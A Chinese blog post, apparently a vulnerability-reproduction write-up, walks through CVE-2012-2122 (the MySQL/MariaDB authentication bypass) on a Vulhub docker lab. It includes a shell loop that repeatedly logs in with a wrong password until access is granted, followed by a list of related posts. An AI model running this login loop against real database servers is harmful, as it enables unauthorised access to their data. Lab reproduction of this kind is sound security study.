MySQL 身份认证漏洞 CVE-2012-2122

最新推荐文章于 2025-10-25 11:05:13 发布

原创最新推荐文章于 2025-10-25 11:05:13 发布 · 522 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#mysql #数据库 #网络安全

漏洞复现专栏收录该内容

6 篇文章

订阅专栏

漏洞影响版本

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
 
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

演示

开启靶场

进入漏洞目录

cd /root/vulhub/mysql/CVE-2012-2122

开启漏洞靶场

docker-compose up -d

攻击

直接运行这个命令

for i in `seq 1 100`;do mysql -uroot -p11111 -h 192.168.61.128 -P3306;done
 
for i in `seq 1 1000`;do mysql -u(账号不用正确) -p(密码不用正确) -h(MySQLIP地址) -P3306;done

这个命令的意思就是：for语句调用终端去连接MySQL，如果存在这个漏洞，他就会不断的去尝试进入 MySQL 数据库中

显示数据库

show databases;

显示数据库版本

select version();

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Manba_77

关注关注

4
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Mysql CVE-2012-2122（vulhub）漏洞复现

MDSEC的博客

08-23

525

当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。

CVE-2012-2122 mysql/mariaDB身份认证漏洞

weixin_68177269的博客

08-12

773

当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，不断的尝试登录连接，回导致MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。影响范围#所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22。可见经过大数量的暴力登录之后，直接不需要密码登录到mysql。使用docker-compose 创建靶场环境。下载安装vulhub靶场环境。二、msf漏洞scan探测。不知道为什么没跑出来🥴。

参与评论您还未登录，请先登录后发表或查看评论

MySQL身份认证漏洞复现：原理详解+环境搭建+渗透实践（CVE-2012-2122 两种方法渗透）

最新发布

mooyuan的网络安全博客

10-25

1430

本文详细分析了MySQL数据库中的高危身份认证绕过漏洞CVE-2012-2122。该漏洞存在于特定版本的MySQL和MariaDB中，由于memcmp()函数比较缺陷，攻击者可通过反复尝试登录绕过认证，获取数据库访问权限。文章通过Vulhub搭建漏洞环境，使用Metasploit和脚本两种方法进行渗透测试，成功获取root账户哈希值并解密。漏洞修复方案包括升级到安全版本(5.5.24+)、限制3306端口访问和加强登录监控。该漏洞利用简单但危害严重，可导致数据库完全沦陷。

Mysql身份认证漏洞 CVE-2012-2122

limb0的博客

11-08

956

Mysql身份认证漏洞 CVE-2012-2122 一、漏洞介绍 MariaDB和MySQL在用户验证的处理上存在漏洞。攻击者可利用该漏洞绕过某些安全限制，也可能导致攻击者无需知道正确口令就能登录到MySQL服务器。当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。也就是说只...

CVE 2012-2122

qq_56895581的博客

05-19

470

我们使用exp在对应版本上的服务进行登陆时，即便密码错误也能成功以root用户登录

mysql身份认证绕过漏洞复现（CVE-2012-2122）

weixin_53730939的博客

03-12

1862

mysql身份认证绕过漏洞复现（CVE-2012-2122）

Mysql 身份认证绕过漏洞（CVE-2012-2122）复现

weixin_57379923的博客

08-09

1177

【Mysql身份认证漏洞复现(CVE-2012-2122)】

qq_61947585的博客

07-06

482

当连接 MariaDB/MySQL 时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是 memcmp() 返回一个非零值，也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入 SQL 数据库。

MySql-身份认证绕过-CVE-2012-2122

m0_57206390的博客

10-27

531

Mysql 身份认证绕过漏洞（CVE-2012-2122）

m0_65354386的博客

07-05

388

环境启动后，将启动一个Mysql服务（版本：5.5.23），监听3306端口，可以在攻击机直接采用shell脚本进行攻击连接数据库。漏洞环境使用vulhub搭建，漏洞目录为vulhub/mysql/CVE-2012-2122。可以先进行正常连接看看是否成功: mysql -h IP -uroot -p123456。拉取镜像启动容器：docker-compose up -d。可以看到在经过多次尝试后成功连接数据库，即复现成功。IP为存在此漏洞的kali的IP，即靶机。在靶机搭建环境并启动容器。

CVE-2012-2122-mysql未授权访问漏洞复现-vulhub

c0529的博客

06-12

1192

简单来说，除了配置上的问题以外，是密码的验证出现了漏洞，导致尝试次数多了之后直接可以登入使用：kali+vulhub。

MySql身份认证绕过漏洞(CVE-2012-2122)

dgjkkhcf的博客

07-24

4998

当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。.........

CVE-2012-2122: MySQL身份认证漏洞

Yatere的天平秤

06-11

2012

http://seclists.org/oss-sec/2012/q2/493 我今天早上打开电脑,在seclists中看到一个很惊人的thread:http://seclists.org/oss-sec/2012/q2/493MySQL爆出了一个很大的安全漏洞，几乎影响5.1至5.5的所有版本。出问题的模块是登录时密码校验的部分(password.c)，在知道用户名的情况下（如

Mysql身份认证漏洞复现(CVE-2012-2122)

又菜又爱倒腾的博客

10-29

2992

#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。二、漏洞影响影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers

Mysql 身份认证绕过漏洞 CVE-2012-2122

m0_73135216的博客

06-05

625

CVE-2012-2122 是一个影响 MySQL 和 MariaDB 的身份验证漏洞，存在于特定版本中任务一介绍 CVE-2012-2122。

MySQL身份认证绕过漏洞（CVE-2012-2122）

qq115399231的博客

07-16

3656

漏洞介绍当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。这个缺陷的根源在于memcmp()函数总是返回-128到127（有符号字符）范围内的值。也就是说，只有在Linux系统使用SSE优化库(GNU C库)的场合下才能被利用,成功触发这一漏洞的概率约为1：256。受影响版...

cve-2012-2122的漏洞原理

06-18

CVE-2012-2122 是一个存在于 MySQL 和 MariaDB 中的身份认证绕过漏洞。该漏洞利用了 `memcmp` 函数在特定编译环境下的行为差异，使得攻击者可以通过构造恶意数据包绕过身份验证[^3]。 #### 漏洞原理 MySQL 的身份...